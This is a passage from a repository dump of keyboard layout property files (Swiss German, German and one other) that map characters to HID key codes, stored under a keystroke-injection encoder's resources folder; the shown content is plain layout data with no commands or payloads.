MODIFIERKEY_SHIFT\t\t\t\t\r\n// 64 @\r\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\t\t\t\r\n// 65 A\r\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\r\n// 66 B\r\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 67 C\r\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 68 D\r\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 69 E\r\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 70 F\r\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 71 G\r\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 72 H\r\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 73 I\r\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 74 J\r\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 75 K\r\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 76 L\r\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 77 M\r\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\t\t\t\r\n// 78 N\r\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 79 O\r\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 80 P\r\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 81 Q\r\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 82 R\r\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 83 S\r\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 84 T\r\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 85 U\r\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 86 V\r\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 87 W\r\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 88 X\r\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 89 Y\r\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 90 Z\r\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 91 [\r\nASCII_5B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT\t\t\t\t\r\n// 92 \r\nASCII_5C = KEY_TILDE, MODIFIERKEY_RIGHT_ALT\t\t\r\n// 93 ]\r\nASCII_5D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\t\t\r\n// 94 ^\r\nASCII_5E = KEY_LEFT_BRACE\t\t\t\t\r\n// 95 _\r\nASCII_5F = KEY_MINUS, MODIFIERKEY_SHIFT\t\t\t\t\t\r\n// 96 `\r\nASCII_60 = KEY_QUOTE\r\n// 97 a\r\nASCII_61 = KEY_A\r\n// 98 b\r\nASCII_62 = KEY_B\t\t\t\t\t\r\n// 99 c\r\nASCII_63 = KEY_C\r\n// 100 d\r\nASCII_64 = KEY_D\t\t\t\t\t\r\n// 101 e\r\nASCII_65 = KEY_E\t\t\t\t\t\r\n// 102 f\r\nASCII_66 = KEY_F\t\t\t\t\t\r\n// 103 g\r\nASCII_67 = KEY_G\t\t\t\t\t\r\n// 104 h\r\nASCII_68 = KEY_H\t\t\t\t\t\r\n// 105 i\r\nASCII_69 = KEY_I\t\t\t\t\t\r\n// 106 j\r\nASCII_6A = KEY_J\t\t\t\t\t\r\n// 107 k\r\nASCII_6B = KEY_K\t\t\t\t\t\r\n// 108 l\r\nASCII_6C = KEY_L\t\t\t\t\t\r\n// 109 m\r\nASCII_6D = KEY_M\t\t\t\t\r\n// 110 n\r\nASCII_6E = KEY_N\t\t\t\t\t\r\n// 111 o\r\nASCII_6F = KEY_O\t\t\t\t\t\r\n// 112 p\r\nASCII_70 = KEY_P\t\t\t\t\t\r\n// 113 q\r\nASCII_71 = KEY_Q\t\t\t\t\t\r\n// 114 r\r\nASCII_72 = KEY_R\t\t\t\t\t\r\n// 115 s\r\nASCII_73 = KEY_S\t\t\t\t\t\r\n// 116 t\r\nASCII_74 = KEY_T\t\t\t\t\t\r\n// 117 u\r\nASCII_75 = KEY_U\t\t\t\t\t\r\n// 118 v\r\nASCII_76 = KEY_V\t\t\t\t\t\r\n// 119 w\r\nASCII_77 = KEY_W\t\t\t\t\t\r\n// 120 x\r\nASCII_78 = KEY_X\t\t\t\t\t\r\n// 121 y\r\nASCII_79 = KEY_Y\t\t\t\t\t\r\n// 122 z\r\nASCII_7A = KEY_Z\t\t\t\t\t\r\n// 123 {\r\nASCII_7B = KEY_QUOTE, MODIFIERKEY_RIGHT_ALT\t\t\t\t\r\n// 124 |\r\nASCII_7C = KEY_TILDE, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 125 }\r\nASCII_7D = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT\t\r\n// 126 ~\r\nASCII_7E = KEY_SEMICOLON, MODIFIERKEY_RIGHT_ALT\t\t\r\n// 127\r\nASCII_7F = KEY_BACKSPACE\r\n// 128 ¢ Pound Sign\r\nISO_8859_1_A2\tKEY_4, MODIFIERKEY_RIGHT_ALT\r\n// 129 £ Pound Sign\r\nISO_8859_1_A3\tKEY_3, MODIFIERKEY_RIGHT_ALT\r\n// 130 ¤\r\nISO_8859_1_A4\tKEY_5, MODIFIERKEY_RIGHT_ALT\r\n// 131 ¦ SECTION SIGN\r\nISO_8859_1_A6\tKEY_7, MODIFIERKEY_RIGHT_ALT\r\n// 132 § SECTION SIGN\r\nISO_8859_1_A7\tKEY_O, MODIFIERKEY_RIGHT_ALT\r\n// 133 ¨\r\nISO_8859_1_A8\tKEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\r\n// 134 ¬\r\nISO_8859_1_AB\tACUTE_ACCENT_BITS + KEY_SPACE, MODIFIERKEY_SHIFT\r\n// 135 ¬\r\nISO_8859_1_AC\tKEY_6, MODIFIERKEY_RIGHT_ALT\r\n// 136 ­\r\nISO_8859_1_AD\tKEY_PERIOD, MODIFIERKEY_RIGHT_ALT\r\n// 137 ¯\r\nISO_8859_1_AF\tKEY_TILDE, MODIFIERKEY_RIGHT_ALT\r\n// 138 °\r\nISO_8859_1_B0\tACUTE_ACCENT_BITS + KEY_SPACE, MODIFIERKEY_RIGHT_ALT\r\n// 139 ´ MICRO SIGN\r\nISO_8859_1_BB\tACUTE_ACCENT_BITS + KEY_SPACE\r\n// 140 ´ MICRO SIGN\r\nISO_8859_1_B4\tKEY_SLASH, MODIFIERKEY_RIGHT_ALT\r\n// 141 µ MICRO SIGN\r\nISO_8859_1_B5\tKEY_M, MODIFIERKEY_RIGHT_ALT\r\n// 142 ¶ MICRO SIGN\r\nISO_8859_1_B6\tKEY_P, MODIFIERKEY_RIGHT_ALT\r\n// 143 ¸ MICRO SIGN\r\nISO_8859_1_B8\tKEY_RIGHT_BRACE\r\n// 145 ± MATH SIGN\r\nISO_8859_1_B1\tKEY_1, MODIFIERKEY_RIGHT_ALT\r\n// 146 ² MATH SIGN\r\nISO_8859_1_B2\tKEY_8, MODIFIERKEY_RIGHT_ALT\r\n// 147 ³ MATH SIGN\r\nISO_8859_1_B3\tKEY_9, MODIFIERKEY_RIGHT_ALT\r\n// 148 ¼ MATH SIGN\r\nISO_8859_1_BC\tKEY_0, MODIFIERKEY_RIGHT_ALT\r\n// 149 ½ MATH SIGN\r\nISO_8859_1_BD\tKEY_MINUS, MODIFIERKEY_RIGHT_ALT\r\n// 150 ¾ MATH SIGN\r\nISO_8859_1_BE\tKEY_EQUAL, MODIFIERKEY_RIGHT_ALT\r\n// 151 É e ACUTE\r\nISO_8859_1_C9\tKEY_SLASH, MODIFIERKEY_SHIFT\r\n// 152 é e ACUTE\r\nISO_8859_1_E9\tKEY_SLASH" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/ch.properties", "content": "//LAYOUT_SWISS_GERMAN 0.9b ¦ Some symbols still missing (Euro, Pound...)\n//Author - Powerslave ¦ Date - 07/02/13 ¦ Website - www.powerslave.ch\n//No Euro Key (not yet), and most of the french crap letters don't work aswell\n//but it works for all standard ASCII Letters, all you need for fun.\nKEY_NON_US_100 = 100\n \nASCII_20 = KEY_SPACE\n// 32 \nASCII_21 = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// 33 !\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\n// 34 \"\nASCII_23 = KEY_3, MODIFIERKEY_RIGHT_ALT\n// 35 # \nASCII_24 = KEY_BACKSLASH\n// 36 $\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\n// 38 &\nASCII_27 = KEY_MINUS\n// 39 ' \nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\n// 40 ( \nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\n// 41 )\nASCII_2A = KEY_3, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_1, MODIFIERKEY_SHIFT\n// 43 +\nASCII_2C = KEY_COMMA\n// 44 ,\nASCII_2D = KEY_SLASH\n// 45 -\nASCII_2E = KEY_PERIOD\n// 46 .\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\n// 47 /\nASCII_30 = KEY_0\n// 48 0\nASCII_31 = KEY_1\n// 49 1\nASCII_32 = KEY_2\n// 50 2\nASCII_33 = KEY_3\n// 51 3\nASCII_34 = KEY_4\n// 52 4\nASCII_35 = KEY_5\n// 53 5\nASCII_36 = KEY_6\n// 54 6\nASCII_37 = KEY_7\n// 55 7\nASCII_38 = KEY_8\n// 55 8\nASCII_39 = KEY_9\n// 57 9\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 58 :\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\n// 59 ;\nASCII_3C = KEY_NON_US_100\n// 60 <\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\n// 61 =\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\n// 64 @\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Z, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_Y, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 91 [\nASCII_5C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT\n// 92 \nASCII_5D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 93 ]\nASCII_5E = KEY_EQUAL\n// 94 ^\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\n// 95 _\nASCII_60 = KEY_EQUAL, MODIFIERKEY_SHIFT\n//GRAVE_ACCENT_BITS + KEY_SPACE \n// 96 `\nASCII_61 = KEY_A\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_M\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_Q\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_W\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Z\n// 121 y\nASCII_7A = KEY_Y\n// 122 z\nASCII_7B = KEY_TILDE, MODIFIERKEY_RIGHT_ALT\n// 123 {\nASCII_7C = KEY_7, MODIFIERKEY_RIGHT_ALT\n// 124 |\nASCII_7D = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT\n// 125 }\nASCII_7E = KEY_EQUAL, MODIFIERKEY_RIGHT_ALT\n// 126 ~\nASCII_7F = KEY_BACKSPACE\n// 127\nISO_8859_1_A0 = KEY_SPACE\n// 160 Nonbreakng Space\nISO_8859_1_A4 = KEY_11, MODIFIERKEY_RIGHT_ALT\n// 164 ¤ Currency Sign\nISO_8859_1_A7 = KEY_TILDE\n// 167 § SECTION SIGN\nISO_8859_1_B0 = KEY_TILDE, MODIFIERKEY_SHIFT\n// 176 ° DEGREE SIGN\nISO_8859_1_B2 = KEY_11, MODIFIERKEY_RIGHT_ALT\n// 178 ² SUPERSCRIPT TWO\nISO_8859_1_B3 = KEY_11, MODIFIERKEY_RIGHT_ALT\n// 179 ³ SUPERSCRIPT THREE\n//ISO_8859_1_C0 = GRAVE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT \n// 192 À A GRAVE\n//ISO_8859_1_C1 = ACUTE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT \n// 193 Á A ACUTE\n//ISO_8859_1_C2 = CIRCUMFLEX_BITS = + KEY_A, MODIFIERKEY_SHIFT \n// 194  A CIRCUMFLEX\nISO_8859_1_C4 = KEY_QUOTE, MODIFIERKEY_SHIFT\n// 196 Ä A DIAERESIS\n//ISO_8859_1_C8 = GRAVE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT \n// 200 È E GRAVE\n//ISO_8859_1_C9 = ACUTE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT \n// 201 É E ACUTE\n//ISO_8859_1_CA = CIRCUMFLEX_BITS + KEY_E, MODIFIERKEY_SHIFT \n// 202 Ê E CIRCUMFLEX\n//ISO_8859_1_CC = GRAVE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT \n// 204 Ì I GRAVE\n//ISO_8859_1_CD = ACUTE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT \n// 205 Í I ACUTE\n//ISO_8859_1_CE = CIRCUMFLEX_BITS + KEY_I, MODIFIERKEY_SHIFT \n// 206 Î I CIRCUMFLEX\n//ISO_8859_1_D2 = GRAVE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT \n// 210 Ò O GRAVE\n//ISO_8859_1_D3 = ACUTE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT \n// 211 Ó O ACUTE\n//ISO_8859_1_D4 = CIRCUMFLEX_BITS + KEY_O, MODIFIERKEY_SHIFT \n// 212 Ô O CIRCUMFLEX\nISO_8859_1_D6 = KEY_SEMICOLON, MODIFIERKEY_SHIFT\n// 214 Ö O DIAERESIS\n//ISO_8859_1_D9 = GRAVE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 217 Ù U GRAVE\n//ISO_8859_1_DA = ACUTE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT \n// 218 Ú U ACUTE\n//ISO_8859_1_DB = CIRCUMFLEX_BITS + KEY_U, MODIFIERKEY_SHIFT \n// 219 Û U CIRCUMFLEX\nISO_8859_1_DC = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 220 Ü U DIAERESIS\n//ISO_8859_1_DD = ACUTE_ACCENT_BITS + KEY_Z, MODIFIERKEY_SHIFT \n// 221 Ý Y ACUTE\nISO_8859_1_DF = KEY_MINUS\n// 223 ß SHARP S\n//ISO_8859_1_E0 = GRAVE_ACCENT_BITS + KEY_A\n// 224 à a GRAVE\n//ISO_8859_1_E1 = ACUTE_ACCENT_BITS + KEY_A\n// 225 á a ACUTE\n//ISO_8859_1_E2 = CIRCUMFLEX_BITS + KEY_A\n// 226 â a CIRCUMFLEX\nISO_8859_1_E4 = KEY_QUOTE\n// 228 ä a DIAERESIS\n//ISO_8859_1_E8 = GRAVE_ACCENT_BITS + KEY_E\n// 232 è e GRAVE\n//ISO_8859_1_E9 = ACUTE_ACCENT_BITS + KEY_E\n// 233 é e ACUTE\n//ISO_8859_1_EA = CIRCUMFLEX_BITS + KEY_E\n// 234 ê e CIRCUMFLEX\n//ISO_8859_1_EC = GRAVE_ACCENT_BITS + KEY_I\n// 236 ì i GRAVE\n//ISO_8859_1_ED = ACUTE_ACCENT_BITS + KEY_I\n// 237 í i ACUTE\n//ISO_8859_1_EE = CIRCUMFLEX_BITS + KEY_I\n// 238 î i CIRCUMFLEX\n//ISO_8859_1_F2 = GRAVE_ACCENT_BITS + KEY_O\n// 242 ò o GRAVE\n//ISO_8859_1_F3 = ACUTE_ACCENT_BITS + KEY_O\n// 243 ó o ACUTE\n//ISO_8859_1_F4 = CIRCUMFLEX_BITS + KEY_O\n// 244 ô o CIRCUMFLEX\nISO_8859_1_F6 = KEY_SEMICOLON\n// 246 ö o DIAERESIS\n//ISO_8859_1_F9 = GRAVE_ACCENT_BITS + KEY_U\n// 249 ù u GRAVE\n//ISO_8859_1_FA = ACUTE_ACCENT_BITS + KEY_U\n// 250 ú u ACUTE\n//ISO_8859_1_FB = CIRCUMFLEX_BITS + KEY_U\n// 251 û u CIRCUMFLEX\nISO_8859_1_FC = KEY_LEFT_BRACE\n// 252 ü u DIAERESIS\n//ISO_8859_1_FD = ACUTE_ACCENT_BITS + KEY_Z\n// 253 ý y ACUTE\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\n// € Euro Sign" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/de.properties", "content": "//LAYOUT_GERMAN\n//Credits go to webdirector for patch (02/17/2013)\nKEY_NON_US_100 = 100\n\nASCII_20 = KEY_SPACE\n// 32 \nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\n// 33 !\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\n// 34 \"\nASCII_23 = KEY_BACKSLASH\n// 35 # ??\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\n// 36 $\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\n// 38 &\nASCII_27 = KEY_BACKSLASH, MODIFIERKEY_SHIFT\n// 39 ' \nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\n// 40 ( \nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\n// 41 )\nASCII_2A = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_RIGHT_BRACE\n// 43 +\nASCII_2C = KEY_COMMA\n// 44 ,\nASCII_2D = KEY_SLASH\n// 45 -\nASCII_2E = KEY_PERIOD\n// 46 .\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\n// 47 /\nASCII_30 = KEY_0\n// 48 0\nASCII_31 = KEY_1\n// 49 1\nASCII_32 = KEY_2\n// 50 2\nASCII_33 = KEY_3\n// 51 3\nASCII_34 = KEY_4\n// 52 4\nASCII_35 = KEY_5\n// 53 5\nASCII_36 = KEY_6\n// 54 6\nASCII_37 = KEY_7\n// 55 7\nASCII_38 = KEY_8\n// 55 8\nASCII_39 = KEY_9\n// 57 9\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 58 :\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\n// 59 ;\nASCII_3C = KEY_NON_US_100\n// 60 <\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\n// 61 =\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_Q, MODIFIERKEY_RIGHT_ALT\n// 64 @\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Z, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_Y, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT\n// 91 [\nASCII_5C = KEY_MINUS, MODIFIERKEY_RIGHT_ALT\n// 92 \nASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT\n// 93 ]\nASCII_5E = KEY_TILDE\n// 94 ^\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\n// 95 _\nASCII_60 = KEY_EQUAL, MODIFIERKEY_SHIFT\n//GRAVE_ACCENT_BITS + KEY_SPACE \n// 96 `\nASCII_61 = KEY_A\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_M\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_Q\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_W\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Z\n// 121 y\nASCII_7A = KEY_Y\n// 122 z\nASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT\n// 123 {\nASCII_7C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT \n// 124 |\nASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT\n// 125 }\nASCII_7E = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT \n// 126 ~\nASCII_7F = KEY_BACKSPACE\n// 127\nISO_8859_1_A0 = KEY_SPACE\n// 160 Nonbreakng Space\nISO_8859_1_A4 = KEY_E, MODIFIERKEY_RIGHT_ALT\n// 164 ¤ Currency Sign\nISO_8859_1_A7 = KEY_3, MODIFIERKEY_SHIFT\n// 167 § SECTION SIGN\nISO_8859_1_B0 = KEY_TILDE, MODIFIERKEY_SHIFT\n// 176 ° DEGREE SIGN\nISO_8859_1_B2 = KEY_2, MODIFIERKEY_RIGHT_ALT\n// 178 ² SUPERSCRIPT TWO\nISO_8859_1_B3 = KEY_3, MODIFIERKEY_RIGHT_ALT\n// 179 ³ SUPERSCRIPT THREE\n//ISO_8859_1_C0 = GRAVE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT \n// 192 À A GRAVE\n//ISO_8859_1_C1 = ACUTE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT \n// 193 Á A ACUTE\n//ISO_8859_1_C2 = CIRCUMFLEX_BITS = + KEY_A, MODIFIERKEY_SHIFT \n// 194  A CIRCUMFLEX\nISO_8859_1_C4 = KEY_QUOTE, MODIFIERKEY_SHIFT\n// 196 Ä A DIAERESIS\n//ISO_8859_1_C8 = GRAVE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT \n// 200 È E GRAVE\n//ISO_8859_1_C9 = ACUTE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT \n// 201 É E ACUTE\n//ISO_8859_1_CA = CIRCUMFLEX_BITS + KEY_E, MODIFIERKEY_SHIFT \n// 202 Ê E CIRCUMFLEX\n//ISO_8859_1_CC = GRAVE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT \n// 204 Ì I GRAVE\n//ISO_8859_1_CD = ACUTE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT \n// 205 Í I ACUTE\n//ISO_8859_1_CE = CIRCUMFLEX_BITS + KEY_I, MODIFIERKEY_SHIFT \n// 206 Î I CIRCUMFLEX\n//ISO_8859_1_D2 = GRAVE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT \n// 210 Ò O GRAVE\n//ISO_8859_1_D3 = ACUTE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT \n// 211 Ó O ACUTE\n//ISO_8859_1_D4 = CIRCUMFLEX_BITS + KEY_O, MODIFIERKEY_SHIFT \n// 212 Ô O CIRCUMFLEX\nISO_8859_1_D6 = KEY_SEMICOLON, MODIFIERKEY_SHIFT\n// 214 Ö O DIAERESIS\n//ISO_8859_1_D9 = GRAVE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 217 Ù U GRAVE\n//ISO_8859_1_DA = ACUTE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT \n// 218 Ú U ACUTE\n//ISO_8859_1_DB = CIRCUMFLEX_BITS + KEY_U, MODIFIERKEY_SHIFT \n// 219 Û U CIRCUMFLEX\nISO_8859_1_DC = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 220 Ü U DIAERESIS\n//ISO_8859_1_DD = ACUTE_ACCENT_BITS + KEY_Z, MODIFIERKEY_SHIFT \n// 221 Ý Y ACUTE\nISO_8859_1_DF = KEY_MINUS\n// 223 ß SHARP S\n//ISO_8859_1_E0 = GRAVE_ACCENT_BITS + KEY_A\n// 224 à a GRAVE\n//ISO_8859_1_E1 = ACUTE_ACCENT_BITS + KEY_A\n// 225 á a ACUTE\n//ISO_8859_1_E2 = CIRCUMFLEX_BITS + KEY_A\n// 226 â a CIRCUMFLEX\nISO_8859_1_E4 = KEY_QUOTE\n// 228 ä a DIAERESIS\n//ISO_8859_1_E8 = GRAVE_ACCENT_BITS + KEY_E\n// 232 è e GRAVE\n//ISO_8859_1_E9 = ACUTE_ACCENT_BITS + KEY_E\n// 233 é e ACUTE\n//ISO_8859_1_EA = 